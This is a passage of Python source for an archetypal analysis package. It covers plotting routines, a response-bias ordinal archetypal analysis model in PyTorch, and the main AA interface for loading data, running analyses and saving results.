plt.legend(prop={'size': 15})
if not save_fig:
plt.show()
else:
plt.savefig("{0}.png".format(filename),dpi=300)
def _attribute_scatter_plot(self,Z,X,attributes,type,p, save_fig, filename,title):
plt.rcParams["figure.figsize"] = (10,10)
plt.scatter(X[attributes[0]-1,:]*p, X[attributes[1]-1,:]*p, c ="black", s = 1)
for a in range(len(Z[0,:])):
plt.scatter(Z[attributes[0]-1,a]*p, Z[attributes[1]-1,a]*p, marker ="^", s = 500, label="Archetype {0}".format(a+1))
plt.xlabel(f"Attribute {attributes[0]}", fontsize=15)
plt.ylabel(f"Attribute {attributes[1]}", fontsize=15)
plt.legend(prop={'size': 15})
if title == "":
plt.title(f"Attribute Scatter Plot of {type}", fontsize = 20)
else:
plt.title(title, fontsize = 20)
if not save_fig:
plt.show()
else:
plt.savefig("{0}.png".format(filename),dpi=300)
def _loss_plot(self,loss,type, save_fig, filename,title):
plt.plot(loss, c="#2c6c8c")
plt.xlabel(f"Iteration of {type}")
plt.ylabel(f"Loss of {type}")
if title == "":
plt.title(f"Loss w.r.t. Itteration of {type}")
else:
plt.title(title)
if not save_fig:
plt.show()
else:
plt.savefig("{0}.png".format(filename),dpi=300)
def _mixture_plot(self,Z,A,type, save_fig, filename,title):
plt.rcParams["figure.figsize"] = (10,10)
fig = plt.figure()
ax = fig.add_subplot(111)
K = len(Z.T)
corners = []
for k in range(K):
corners.append([np.cos(((2*np.pi)/K)*(k)), np.sin(((2*np.pi)/K)*(k))])
plt.plot(
np.cos(((2*np.pi)/K)*(k)),
np.sin(((2*np.pi)/K)*(k)),
marker="o", markersize=12,
markeredgecolor="black",
zorder=10,
label = "Archetype {0}".format(k+1))
points_x = []
points_y = []
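        # Each observation is drawn at the convex combination of the archetype corners
        # given by its weight vector in A, i.e. (x, y) = sum_k A[k, n] * corner_k.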
for p in A.T:
x = 0
y = 0
for k in range(K):
x += p[k] * np.cos(((2*np.pi)/K)*(k))
y += p[k] * np.sin(((2*np.pi)/K)*(k))
points_x.append(x)
points_y.append(y)
p = Polygon(corners, closed=False,zorder=0)
ax.add_patch(p)
ax.set_xlim(-1.1,1.1)
ax.set_ylim(-1.1,1.1)
ax.set_aspect('equal')
if title == "":
plt.title(f"Mixture Plot of {type}", fontsize = 20)
else:
plt.title(title, fontsize = 20)
plt.scatter(points_x, points_y, c ="black", s = 1, zorder=5)
plt.legend()
if not save_fig:
plt.show()
else:
plt.savefig("{0}.png".format(filename),dpi=300)
def _barplot(self,Z,columns, archetype_number,type,p, save_fig, filename,title):
plt.rcParams["figure.figsize"] = (10,10)
archetype = Z.T[archetype_number-1]
if type in ["OAA","RBOAA"]:
archetype *=p
fig, ax = plt.subplots()
ax.set_ylabel('Value')
plt.xlabel('Attributes')
if title == "":
ax.set_title(f"Value-Distribution of Archeype {archetype_number}")
else:
ax.set_title(title)
ax.bar(np.arange(len(archetype)),archetype)
ax.set_xticks(np.arange(len(archetype)))
ax.set_xticklabels(labels=columns)
plt.ylim(0, p+0.5)
plt.setp(ax.get_xticklabels(), rotation=45, ha="right", rotation_mode="anchor")
fig.set_size_inches(10, 10)
if not save_fig:
plt.show()
else:
plt.savefig("{0}.png".format(filename),dpi=300)
def _barplot_all(self,Z,columns,type, p, save_fig, filename,title):
plt.rcParams["figure.figsize"] = (10,10)
data = []
names = ["Attributes"]
for (arch, column) in zip(Z,columns):
current_data = [column]
for value in arch:
if type in ["OAA","RBOAA"]:
value *=p
current_data.append(value)
data.append(current_data)
for i in range(len(Z.T)):
names.append("Archetype {0}".format(i+1))
df=pd.DataFrame(data,columns=names)
df.plot(x="Attributes", y=names[1:], kind="bar",figsize=(10,10))
plt.ylim(0.0, p+0.5)
plt.ylabel(f"Value")
if title == "":
plt.title(f"Value-Distribution over All Archetypes")
else:
plt.title(title)
if not save_fig:
plt.show()
else:
plt.savefig("{0}.png".format(filename),dpi=300)
def _typal_plot(self, Z, types, weighted, save_fig, filename,title):
plt.rcParams["figure.figsize"] = (10,10)
fig, ax = plt.subplots()
type_names = types.keys()
type_names_display = list(types.keys())
labels = [f"Archetype {i}" for i in range(len(Z.T))]
width = 0.5
bottoms = []
bottoms.append([0 for i in range(len(Z.T))])
values = []
for label in type_names:
label_values = []
for archetype in Z.T:
archetype_value = 0
                for i in types[label]:
archetype_value += archetype[i]
if weighted in ["equal","equal_norm"]:
archetype_value = archetype_value / len(types[label])
label_values.append(archetype_value)
values.append(label_values)
values_new = np.array(values)
if weighted in ["norm","equal_norm"]:
for i in range(len(values)):
values_new[i] = values_new[i] / np.sum(values,0)
for i in range(len(values)-1):
bottoms.append([b + l for (b,l) in zip(bottoms[-1],values_new[i])])
for i in range(len(values)):
ax.bar(labels, values_new[i], width, bottom=bottoms[i], label=type_names_display[i])
ax.set_ylabel('Value')
if title == "":
ax.set_title('Typal Composition of Archetypes')
else:
ax.set_title(title)
ax.legend()
if not save_fig:
plt.show()
else:
plt.savefig("{0}.png".format(filename),dpi=300)
def _pie_chart(self, A, indexes, attribute_indexes, archetype_dataframe, save_fig, filename,title):
data = []
if attribute_indexes == []:
for i in range(len(indexes)):
datapoint = A.T[indexes[i]]
if len(data) == 0:
data = datapoint
else:
data = data + datapoint / 2
else:
data_subset = archetype_dataframe.copy()
for pair in attribute_indexes:
if pair[1] == "=":
data_subset = data_subset.loc[data_subset[pair[0]] == pair[2]]
elif pair[1] == "<":
data_subset = data_subset.loc[data_subset[pair[0]] < pair[2]]
elif pair[1] == ">":
data_subset = data_subset.loc[data_subset[pair[0]] > pair[2]]
if data_subset.shape[0] < 1:
print("\nThere are no datapoints with the value(s) given by the 'attribute_indexes' parameter.")
return
for i in range(data_subset.shape[0]):
datapoint = A.T[i]
if len(data) == 0:
data = datapoint
else:
data = data + datapoint / 2
labels = []
explode = []
for i in range(len(A.T[0])):
labels.append("Archetype {0}".format(i+1))
if data[i] == np.max(data):
explode.append(0.1)
else:
explode.append(0.0)
plt.pie(data,explode=tuple(explode), labels = labels, shadow=True, startangle=90, autopct='%1.1f%%')
if title == "":
plt.title("Pie Chart of Archetype Distribution on Given Subset of Data")
else:
plt.title(title)
if not save_fig:
plt.show()
else:
plt.savefig("{0}.png".format(filename),dpi=300)
def _attribute_distribution(self, A, Z, indexes, columns, p, type, attribute_indexes, archetype_dataframe, save_fig, filename, title):
archetype_distribution = []
if attribute_indexes == []:
for i in range(len(indexes)):
datapoint = A.T[indexes[i]]
if len(archetype_distribution) == 0:
archetype_distribution = datapoint
else:
archetype_distribution = archetype_distribution + datapoint / 2
else:
data_subset = archetype_dataframe.copy()
for pair in attribute_indexes:
if pair[1] == "=":
data_subset = data_subset.loc[data_subset[pair[0]] == pair[2]]
elif pair[1] == "<":
data_subset = data_subset.loc[data_subset[pair[0]] < pair[2]]
elif pair[1] == ">":
data_subset = data_subset.loc[data_subset[pair[0]] > pair[2]]
if data_subset.shape[0] < 1:
print("\nThere are no datapoints with the value {0} of attribute {1}.\n".format(attribute_indexes[1],attribute_indexes[0]))
return
for i in range(data_subset.shape[0]):
datapoint = A.T[i]
if len(archetype_distribution) == 0:
archetype_distribution = datapoint
else:
archetype_distribution = archetype_distribution + datapoint / 2
archetype_distribution = archetype_distribution/np.sum(archetype_distribution)
attribute_distribution = []
for a in range(len(archetype_distribution)):
if len(attribute_distribution) == 0:
attribute_distribution = Z.T[a]*archetype_distribution[a]
else:
attribute_distribution += Z.T[a]*archetype_distribution[a]
plt.rcParams["figure.figsize"] = (10,10)
if type in ["OAA","RBOAA"]:
attribute_distribution *=p
fig, ax = plt.subplots()
ax.set_ylabel('Value')
plt.xlabel('Attributes')
if title == "":
ax.set_title(f"Value-Distribution of Archetype")
else:
ax.set_title(title)
ax.bar(np.arange(len(attribute_distribution)),attribute_distribution)
ax.set_xticks(np.arange(len(attribute_distribution)))
ax.set_xticklabels(labels=columns)
plt.ylim(0, p+0.5)
plt.setp(ax.get_xticklabels(), rotation=45, ha="right", rotation_mode="anchor")
fig.set_size_inches(10, 10)
if not save_fig:
plt.show()
else:
plt.savefig("{0}.png".format(filename),dpi=300)
def _circular_typal_barplot(self, type, Z, types, archetype_number,columns,p, save_fig, filename, title):
archetype = Z.T[archetype_number-1]
if type in ["OAA","RBOAA"]:
archetype *=p
type_values = []
type_names = types.keys()
for type in type_names:
type_value = 0
for attribute in types[type]:
type_value += archetype[attribute-1]
type_values.append(type_value/len(types[type]))
archetype = type_values
ANGLES = np.linspace(0.0, 2 * np.pi - 0.0, len(archetype), endpoint=False)
width = 1/(len(archetype)/6.3)
fig, ax = plt.subplots(figsize=(9, 12.6), subplot_kw={"projection": "polar"})
fig.patch.set_facecolor("white")
ax.set_facecolor("#dae5eb")
ax.set_theta_offset(1.2 * np.pi / 2)
ax.set_ylim(0, p)
ax.bar(ANGLES, archetype, alpha=0.9, width=width, zorder=10)
ax.vlines(ANGLES, 0, p, ls=(0, (4, 4)), zorder=11)
ax.set_xticks(ANGLES)
ax.set_xticklabels(type_names, size=12)
if title == "":
ax.set_title("Circular Typal Barplot of Archetype {0}".format(archetype_number),size = 25)
else:
ax.set_title(title,size = 25)
if not save_fig:
plt.show()
else:
            plt.savefig("{0}.png".format(filename),dpi=300)
import numpy as np
import torch
import torch.nn as nn
import torch.optim as optim
from timeit import default_timer as timer
from AAM.AA_result_class import _OAA_result
from AAM.loading_bar_class import _loading_bar
from AAM.OAA_class import _OAA
########## ORDINAL ARCHETYPAL ANALYSIS CLASS ##########
class _RBOAA:
########## HELPER FUNCTION // EARLY STOPPING ##########
def _early_stopping(self):
next_imp = self.loss[-round(len(self.loss)/100)]-self.loss[-1]
prev_imp = (self.loss[0]-self.loss[-1])*1e-5
return next_imp < prev_imp
########## HELPER FUNCTION // A AND B ##########
def _apply_constraints_AB(self,A):
m = nn.Softmax(dim=1)
return m(A)
########## HELPER FUNCTION // BETAS ##########
def _apply_constraints_beta(self,b):
betas = torch.empty((self.N,self.p+1))
betas[:,0] = 0
betas[:, 1:self.p+1] = torch.cumsum(torch.nn.functional.softmax(b.clone(),dim=1),dim=1)
return betas
########## HELPER FUNCTION // SIGMA ##########
def _apply_constraints_sigma(self,sigma):
m = nn.Softplus()
return m(sigma)
########## HELPER FUNCTION // ALPHA ##########
def _calculate_alpha(self,b):
alphas = (b[:,0:self.p] + b[:,1:self.p+1]) / 2
return alphas
########## HELPER FUNCTION // X_tilde ##########
def _calculate_X_tilde(self,X,alphas):
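        # For every response x in {1, ..., p}, gather picks the midpoint alpha of its
        # threshold interval (X is 1-based, hence the X - 1 column index).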
X_tilde = torch.gather(alphas,1,X-1)
return X_tilde
########## HELPER FUNCTION // X_hat ##########
def _calculate_X_hat(self,X_tilde,A,B):
Z = B @ X_tilde
X_hat = A @ Z
return X_hat
########## HELPER FUNCTION // LOSS ##########
def _calculate_loss(self,Xt, X_hat, b, sigma):
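        # Ordinal likelihood: P(x = k) = Phi((b_k - x_hat) / sigma) - Phi((b_{k-1} - x_hat) / sigma),
        # with the boundary categories treated as open-ended via the +/- inf overrides below.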
z_next = (torch.gather(b,1,Xt)-X_hat)/sigma
z_prev = (torch.gather(b,1,Xt-1)-X_hat)/sigma
        z_next[Xt == len(b[0,:]) - 1] = np.inf  # top category is open-ended, mirroring the Xt == 1 case below
z_prev[Xt == 1] = -np.inf
P_next = torch.distributions.normal.Normal(0, 1).cdf(z_next)
P_prev = torch.distributions.normal.Normal(0, 1).cdf(z_prev)
neg_logP = -torch.log(( P_next - P_prev ) +1e-10)
loss = torch.sum(neg_logP)
return loss
########## HELPER FUNCTION // ERROR ##########
def _error(self,Xt,A_non_constraint,B_non_constraint,b_non_constraint,sigma_non_constraint):
A = self._apply_constraints_AB(A_non_constraint)
B = self._apply_constraints_AB(B_non_constraint)
b = self._apply_constraints_beta(b_non_constraint)
sigma = self._apply_constraints_sigma(sigma_non_constraint)
alphas = self._calculate_alpha(b)
X_tilde = self._calculate_X_tilde(Xt,alphas)
X_hat = self._calculate_X_hat(X_tilde,A,B)
loss = self._calculate_loss(Xt, X_hat, b, sigma)
return loss
########## COMPUTE ARCHETYPES FUNCTION OF OAA ##########
def _compute_archetypes(self,
X, K, p, n_iter, lr, mute, columns,
with_synthetic_data = False,
early_stopping = False,
with_OAA_initialization = False):
########## INITIALIZATION ##########
self.N, self.M = len(X.T), len(X.T[0,:])
Xt = torch.tensor(X.T, dtype = torch.long)
self.N_arange = [m for m in range(self.M) for n in range(self.N)]
self.M_arange = [n for n in range(self.N) for m in range(self.M)]
self.p = p
self.loss = []
start = timer()
if with_OAA_initialization:
if not mute:
print("\nPerforming OAA for initialization of ROBAA.")
OAA = _OAA()
A_hot, B_hot, sigma_hot, b_hot = OAA._compute_archetypes(X, K, p, n_iter, 0.01, mute, columns, with_synthetic_data = with_synthetic_data, early_stopping = early_stopping, for_hotstart_usage=True)
A_non_constraint = torch.autograd.Variable(torch.tensor(A_hot), requires_grad=True)
B_non_constraint = torch.autograd.Variable(torch.tensor(B_hot), requires_grad=True)
sigma_non_constraint = torch.autograd.Variable(torch.tensor(sigma_hot).repeat(self.N,1), requires_grad=True)
b_non_constraint = torch.autograd.Variable(torch.tensor(b_hot).repeat(self.N,1), requires_grad=True)
else:
A_non_constraint = torch.autograd.Variable(torch.randn(self.N, K), requires_grad=True)
B_non_constraint = torch.autograd.Variable(torch.randn(K, self.N), requires_grad=True)
sigma_non_constraint = torch.autograd.Variable(torch.randn(1).repeat(self.N,1), requires_grad=True)
b_non_constraint = torch.autograd.Variable(torch.rand(self.N,p), requires_grad=True)
optimizer = optim.Adam([A_non_constraint,
B_non_constraint,
b_non_constraint,
sigma_non_constraint], amsgrad = True, lr = lr)
if not mute:
loading_bar = _loading_bar(n_iter, "Response Bias Ordinal Archetypal Analysis")
########## ANALYSIS ##########
for i in range(n_iter):
if not mute:
loading_bar._update()
optimizer.zero_grad()
L = self._error(Xt,A_non_constraint,B_non_constraint,b_non_constraint,sigma_non_constraint)
self.loss.append(L.detach().numpy())
L.backward()
optimizer.step()
########## EARLY STOPPING ##########
if i % 25 == 0 and early_stopping:
if len(self.loss) > 200 and self._early_stopping():
if not mute:
loading_bar._kill()
print("Analysis ended due to early stopping.\n")
break
########## POST ANALYSIS ##########
A_f = self._apply_constraints_AB(A_non_constraint).detach().numpy()
B_f = self._apply_constraints_AB(B_non_constraint).detach().numpy()
b_f = self._apply_constraints_beta(b_non_constraint)
alphas_f = self._calculate_alpha(b_f)
X_tilde_f = self._calculate_X_tilde(Xt,alphas_f).detach().numpy()
Z_tilde_f = (self._apply_constraints_AB(B_non_constraint).detach().numpy() @ X_tilde_f)
sigma_f = self._apply_constraints_sigma(sigma_non_constraint).detach().numpy()
X_hat_f = self._calculate_X_hat(X_tilde_f,A_f,B_f)
end = timer()
time = round(end-start,2)
Z_f = B_f @ X_tilde_f
########## CREATE RESULT INSTANCE ##########
result = _OAA_result(
A_f.T,
B_f.T,
X,
n_iter,
b_f.detach().numpy()[:,1:-1],
Z_f.T,
X_tilde_f.T,
Z_tilde_f.T,
X_hat_f.T,
self.loss,
K,
p,
time,
columns,
"RBOAA",
sigma_f,
with_synthetic_data=with_synthetic_data)
if not mute:
result._print()
        return result

# ===== end of file: AAM/RBOAA_class.py (package: AA-module) =====
from AAM.CAA_class import _CAA
from AAM.OAA_class import _OAA
from AAM.RBOAA_class import _RBOAA
from AAM.TSAA_class import _TSAA
from AAM.synthetic_data_class import _synthetic_data
import pandas as pd
import numpy as np
import pickle
from os import path
########## ARCHETYPAL ANALYSIS MODULE CLASS ##########
class AA:
def __init__(self):
import AAM.AA_result_class as AA_result_class
self._CAA = _CAA()
self._OAA = _OAA()
self._RBOAA = _RBOAA()
self._TSAA = _TSAA()
self._results = {"CAA": [], "OAA": [], "RBOAA": [], "TSAA": []}
self._synthetic_results = {"CAA": [], "OAA": [], "RBOAA": [], "TSAA": []}
self._has_data = False
self.has_synthetic_data = False
self.has_dataframe = False
self.has_archetype_dataframe = False
self.archetype_dataframe = pd.DataFrame()
self.has_ranked_archetype_dataframe = False
self.ranked_archetype_dataframe = pd.DataFrame()
    def load_data(self, X: np.ndarray, columns: list):
self.columns = columns
self.X = X
self.N, self.M = X.shape
self._has_data = True
if self.N<self.M:
print("Your data has more attributes than subjects.")
print(f"Your data has {self.M} attributes and {self.N} subjects.")
print("This is highly unusual for this type of data.")
print("Please try loading transposed data instead.")
else:
print(f"\nThe data was loaded successfully!\n")
    def load_csv(self, filename: str, columns: list, rows: int = None, mute: bool = False):
self.columns, self.M, self.N, self.X = self._clean_data(filename, columns, rows)
self._has_data = True
if not mute:
print(f"\nThe data of \'{filename}\' was loaded successfully!\n")
def _clean_data(self, filename, columns, rows):
df = pd.read_csv(filename)
column_names = df.columns.to_numpy()
        if columns is not None:
            column_names = column_names[columns]
        X = df[column_names]
if not rows is None:
X = X.iloc[range(rows),:]
self.has_dataframe = True
self.dataframe = df.iloc[range(rows),:]
else:
self.has_dataframe = True
self.dataframe = df
X = X.to_numpy().T
M, N = X.shape
return column_names, M, N, X
def create_synthetic_data(self, N: int = 1000, M: int = 10, K: int = 3, p: int = 6, sigma: float = -20.0, rb: bool = False, b_param: float = 100, a_param: float = 1, sigma_dev: float = 0, mute = False):
if N < 2:
print("The value of N can't be less than 2. The value specified was {0}".format(N))
elif M < 2:
print("The value of M can't be less than 2. The value specified was {0}".format(M))
elif K < 2:
print("The value of K can't be less than 2. The value specified was {0}".format(K))
elif p < 2:
print("The value of p can't be less than 2. The value specified was {0}".format(p))
else:
self._synthetic_data = _synthetic_data(N, M, K, p, sigma, rb, a_param, b_param, sigma_std = sigma_dev)
self.has_synthetic_data = True
self._synthetic_results = {"CAA": [], "OAA": [], "RBOAA": [], "TSAA": []}
if not mute:
print("\nThe synthetic data was successfully created! To use the data in an analysis, specificy the with_synthetic_data parameter as True.\n")
def analyse(self, K: int = 3, p: int = 6, n_iter: int = 1000, early_stopping: bool = True, model_type = "all", lr: float = 0.01, mute: bool = False, with_synthetic_data: bool = False, with_hot_start: bool = False):
success = True
if model_type == "TSAA":
print("The model_type TSAA has been deprecated, due to errors in the method.")
success = False
        elif self._has_data and not with_synthetic_data:
            if model_type not in ("all", "CAA", "OAA", "RBOAA", "TSAA"):
                print("The specified model_type \"{0}\" does not match any of the possible AA types.".format(model_type))
                success = False
            # Independent checks so that model_type == "all" runs every model instead of
            # stopping after CAA, as the previous elif-chain did.
            if model_type == "all" or model_type == "CAA":
                self._results["CAA"].insert(0,self._CAA._compute_archetypes(self.X, K, p, n_iter, lr, mute,self.columns,early_stopping=early_stopping))
            if model_type == "all" or model_type == "OAA":
                self._results["OAA"].insert(0,self._OAA._compute_archetypes(self.X, K, p, n_iter, lr, mute,self.columns,with_synthetic_data=False,early_stopping=early_stopping))
            if model_type == "all" or model_type == "RBOAA":
                self._results["RBOAA"].insert(0,self._RBOAA._compute_archetypes(self.X, K, p, n_iter, lr, mute,self.columns, with_synthetic_data=False, early_stopping=early_stopping, with_OAA_initialization = with_hot_start))
            if model_type == "TSAA":  # unreachable: TSAA is rejected as deprecated above
                self._results["TSAA"].insert(0,self._TSAA._compute_archetypes(self.X, K, p, n_iter, lr, mute,self.columns,early_stopping=early_stopping))
        elif self.has_synthetic_data and with_synthetic_data:
            if model_type not in ("all", "CAA", "OAA", "RBOAA", "TSAA"):
                print("The specified model_type \"{0}\" does not match any of the possible AA types.".format(model_type))
                success = False
            if model_type == "all" or model_type == "CAA":
                self._synthetic_results["CAA"].insert(0,self._CAA._compute_archetypes(self._synthetic_data.X, K, p, n_iter, lr, mute, self._synthetic_data.columns, with_synthetic_data=True,early_stopping=early_stopping))
            if model_type == "all" or model_type == "OAA":
                self._synthetic_results["OAA"].insert(0,self._OAA._compute_archetypes(self._synthetic_data.X, K, p, n_iter, lr, mute, self._synthetic_data.columns,with_synthetic_data=True,early_stopping=early_stopping,for_hotstart_usage=False))
            if model_type == "all" or model_type == "RBOAA":
                self._synthetic_results["RBOAA"].insert(0,self._RBOAA._compute_archetypes(self._synthetic_data.X, K, p, n_iter, lr, mute, self._synthetic_data.columns,with_synthetic_data=True,early_stopping=early_stopping,with_OAA_initialization = with_hot_start))
            if model_type == "TSAA":  # unreachable: TSAA is rejected as deprecated above
                self._synthetic_results["TSAA"].insert(0,self._TSAA._compute_archetypes(self._synthetic_data.X, K, p, n_iter, lr, mute, self._synthetic_data.columns,with_synthetic_data=True,early_stopping=early_stopping))
else:
print("\nYou have not loaded any data yet! \nPlease load data through the \'load_data\' or \'load_csv\' methods and try again.\n")
success = False
if success and self.has_dataframe:
self.create_dataframe(model_type=model_type,with_synthetic_data=with_synthetic_data,mute=True)
self.create_dataframe(model_type=model_type,with_synthetic_data=with_synthetic_data,archetype_rank=3,mute=True)
def plot(self,
model_type: str = "CAA",
plot_type: str = "PCA_scatter_plot",
title: str = "",
save_figure: bool = False,
filename: str = "figure",
result_number: int = 0,
             attributes: list = [1,2],
archetype_number: int = 1,
types: dict = {"type 1": [1],"type 2": [2]},
weighted: str = "equal_norm",
             subject_indexes: list = [1],
             attribute_indexes: list = [],
with_synthetic_data: bool = False):
if not model_type in ["CAA", "OAA", "RBOAA", "TSAA"]:
print("\nThe model type you have specified can not be recognized. Please try again.")
elif not plot_type in ["PCA_scatter_plot","attribute_scatter_plot","loss_plot","mixture_plot","barplot","barplot_all","typal_plot","pie_chart","attribute_distribution","circular_typal_barplot"]:
print("\nThe plot type you have specified can not be recognized. Please try again.\n")
elif not weighted in ["none","equal_norm","equal","norm"]:
print(f"\nThe \'weighted\' parameter received an unexpected value of {weighted}.\n")
        elif attribute_indexes != [] and not self.has_archetype_dataframe:
            print("\nYou have not created a dataframe to plot with respect to.\n")
elif not with_synthetic_data:
if result_number < 0 or not result_number < len(self._results[model_type]):
print("\nThe result you are requesting to plot is not availabe.\n Please make sure you have specified the input correctly.\n")
elif archetype_number < 1 or archetype_number > self._results[model_type][result_number].K:
print(f"\nThe \'archetype_number\' parameter received an unexpected value of {archetype_number}.\n")
elif any(np.array(attributes) < 0) or any(np.array(attributes) > len(self._results[model_type][result_number].columns)):
print(f"\nThe \'attributes\' parameter received an unexpected value of {attributes}.\n")
elif any(np.array(subject_indexes) < 0) or any(np.array(subject_indexes) > self._results[model_type][result_number].N-1):
print(f"\nThe \'subject_indexes\' parameter received an unexpected value of {subject_indexes}.\n")
else:
result = self._results[model_type][result_number]
result._plot(plot_type,attributes,archetype_number,types,weighted,subject_indexes,attribute_indexes, self.archetype_dataframe ,save_figure,filename,title)
if save_figure:
print("\nThe requested plot was successfully saved to your device!\n")
else:
print("\nThe requested plot was successfully plotted!\n")
else:
if result_number < 0 or not result_number < len(self._synthetic_results[model_type]):
print("\nThe result you are requesting to plot is not available.\n Please make sure you have specified the input correctly.\n")
            elif archetype_number < 1 or archetype_number > self._synthetic_results[model_type][result_number].K:
print(f"\nThe \'archetype_number\' parameter received an unexpected value of {archetype_number}.\n")
elif any(np.array(attributes) < 0) or any(np.array(attributes) > len(self._synthetic_results[model_type][result_number].columns)):
print(f"\nThe \'attributes\' parameter received an unexpected value of {attributes}.\n")
elif any(np.array(subject_indexes) < 0) or any(np.array(subject_indexes) > self._synthetic_results[model_type][result_number].N-1):
print(f"\nThe \'subject_indexes\' parameter received an unexpected value of {subject_indexes}.\n")
else:
result = self._synthetic_results[model_type][result_number]
result._plot(plot_type,attributes,archetype_number,types,weighted,subject_indexes,attribute_indexes, self.archetype_dataframe,save_figure,filename,title)
print("\nThe requested synthetic data result plot was successfully plotted!\n")
def save_analysis(self,filename: str = "analysis",model_type: str = "CAA", result_number: int = 0, with_synthetic_data: bool = False, save_synthetic_data: bool = True):
if not model_type in ["CAA", "OAA", "RBOAA", "TSAA"]:
print("\nThe model type you have specified can not be recognized. Please try again.\n")
if not with_synthetic_data:
if not result_number < len(self._results[model_type]):
print("\nThe analysis you are requesting to save is not available.\n Please make sure you have specified the input correctly.\n")
else:
self._results[model_type][result_number]._save(filename)
print("\nThe analysis was successfully saved!\n")
else:
if not result_number < len(self._synthetic_results[model_type]):
print("\nThe analysis with synthetic data, which you are requesting to save is not available.\n Please make sure you have specified the input correctly.\n")
else:
self._synthetic_results[model_type][result_number]._save(filename)
if save_synthetic_data:
self._synthetic_data._save(model_type,filename)
print("\nThe analysis was successfully saved!\n")
def load_analysis(self, filename: str = "analysis", model_type: str = "CAA", with_synthetic_data: bool = False):
if not model_type in ["CAA", "OAA", "RBOAA", "TSAA"]:
print("\nThe model type you have specified can not be recognized. Please try again.\n")
elif not with_synthetic_data:
if not path.exists("results/" + model_type + "_" + filename + '.obj'):
print(f"The analysis {filename} of type {model_type} does not exist on your device.")
else:
file = open("results/" + model_type + "_" + filename + '.obj','rb')
result = pickle.load(file)
file.close()
self._results[model_type].append(result)
print("\nThe analysis was successfully loaded!\n")
else:
if not path.exists("synthetic_results/" + model_type + "_" + filename + '.obj'):
print(f"The analysis {filename} with synthetic data of type {model_type} does not exist on your device.")
else:
file = open("synthetic_results/" + model_type + "_" + filename + '.obj','rb')
result = pickle.load(file)
file.close()
self._synthetic_results[model_type].append(result)
file = open("synthetic_results/" + model_type + "_" + filename + '_metadata' + '.obj','rb')
result = pickle.load(file)
file.close()
self._synthetic_data = result
print("\nThe analysis with synthetic data was successfully loaded!\n")
self.has_synthetic_data = True
def create_dataframe(self, model_type: str = "CAA", result_number: int = 0, with_synthetic_data: bool = False, archetype_rank: int = 0, return_dataframe: bool = False, mute = False):
if not model_type in ["CAA", "OAA", "RBOAA", "TSAA"]:
print("\nThe model type you have specified can not be recognized. Please try again.\n")
return
if (with_synthetic_data and len(self._synthetic_results[model_type]) <= result_number) or (not with_synthetic_data and len(self._results[model_type]) <= result_number):
print("\nThe result you have specified to create the dataframe can not be recognized. Please try again.\n")
return
if with_synthetic_data:
result = self._synthetic_results[model_type][result_number]
else:
result = self._results[model_type][result_number]
        if not archetype_rank:
if self.has_dataframe:
self.archetype_dataframe = self.dataframe.copy()
for archetype in range(result.K):
self.archetype_dataframe["Archetype {0}".format(archetype+1)] = result.A[archetype,:]
if not mute:
print("\nThe dataframe was successfully created from a copy of your imported dataframe.\n")
else:
                arch_dict = {}
                for archetype in range(result.K):
                    arch_dict["Archetype {0}".format(archetype+1)] = result.A[archetype,:]
                archetype_dataframe = pd.DataFrame.from_dict(arch_dict)
self.archetype_dataframe = archetype_dataframe
if not mute:
print("\nThe dataframe was successfully created.\n")
else:
if self.has_dataframe:
self.ranked_archetype_dataframe = self.dataframe.copy()
for rank in range(archetype_rank):
rank_list = []
for n in range(result.N):
rank_list.append(np.where(result.A[:,n] == np.sort(result.A[:,n])[::-1][rank])[0][0]+1)
self.ranked_archetype_dataframe["Archetype Rank {0}".format(rank+1)] = rank_list
if not mute:
print("\nThe dataframe was successfully created from a copy of your imported dataframe.\n")
        if not archetype_rank:
self.has_archetype_dataframe = True
if return_dataframe:
return self.archetype_dataframe
else:
self.has_ranked_archetype_dataframe = True
if return_dataframe:
return self.ranked_archetype_dataframe
def get_dataframe(self,ranked_dataframe: bool = False):
if not ranked_dataframe:
if not self.has_archetype_dataframe:
print("\nThe dataframe which you have requested, does not exist yet.\n")
return self.archetype_dataframe
else:
if not self.has_ranked_archetype_dataframe:
print("\nThe dataframe which you have requested, does not exist yet.\n")
return self.ranked_archetype_dataframe
def get_analysis(self, model_type: str = "CAA", result_number: int = 0, with_synthetic_data: bool = False):
if not model_type in ["CAA", "OAA", "RBOAA", "TSAA"]:
print("\nThe model type you have specified can not be recognized. Please try again.\n")
return
if (with_synthetic_data and len(self._synthetic_results[model_type]) <= result_number) or (not with_synthetic_data and len(self._results[model_type]) <= result_number):
print("\nThe result you have specified to create the dataframe can not be recognized. Please try again.\n")
return
if with_synthetic_data:
result = self._synthetic_results[model_type][result_number]
else:
result = self._results[model_type][result_number]
        return result

# ===== end of file: AAM/AA_class.py (package: AA-module) =====
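
# A minimal usage sketch for the AA module (illustrative parameter values; assumes the
# AAM package and its dependencies are installed):
#
#     from AAM.AA_class import AA
#     aa = AA()
#     aa.create_synthetic_data(N=500, M=10, K=3, p=5, sigma=-3.0)
#     aa.analyse(K=3, p=5, n_iter=2000, model_type="OAA", with_synthetic_data=True)
#     result = aa.get_analysis(model_type="OAA", with_synthetic_data=True)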
from AAM.plots_class import _plots
import pickle
########## CONVENTIONAL ARCHETYPAL ANALYSIS RESULT ##########
class _CAA_result:
plots = _plots()
def __init__(self, A, B, X, X_hat, n_iter, RSS, Z, K, p, time, columns,type, with_synthetic_data = False):
self.A = A
self.B = B
self.X = X
self.X_hat = X_hat
self.n_iter = len(RSS)
self.loss = RSS
self.Z = Z
self.K = K
self.p = p
self.time = time
self.columns = columns
self.type = type
self.with_synthetic_data = with_synthetic_data
self.N = len(self.X[0,:])
def _print(self):
if self.type == "CAA":
type_name = "Conventional Archetypal"
else:
type_name = "Two Step Archetypal"
print("/////////////// INFORMATION ABOUT " + type_name.upper() + " ANALYSIS \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\")
print(f"▣ The " + type_name + " Analysis was computed using " + str(self.K) + " archetypes.")
print(f"▣ The " + type_name + " Analysis was computed on " + str(len(self.X)) + " attributes.")
print(f"▣ The " + type_name + " Analysis was computed on " + str(self.N) + " subjects.")
print(f"▣ The " + type_name + " Analysis ran for " + str(self.n_iter) + " iterations.")
print(f"▣ The " + type_name + " Analysis took " + str(self.time) + " seconds to complete.")
print(f"▣ The final RSS was: {self.loss[-1]}.")
def _plot(self,plot_type, attributes, archetype_number, types, weighted, subject_indexes, attribute_indexes, archetype_dataframe, save_figure, filename,title):
if plot_type == "PCA_scatter_plot":
self.plots._PCA_scatter_plot(self.Z,self.X_hat,self.type, save_figure, filename,title)
elif plot_type == "attribute_scatter_plot":
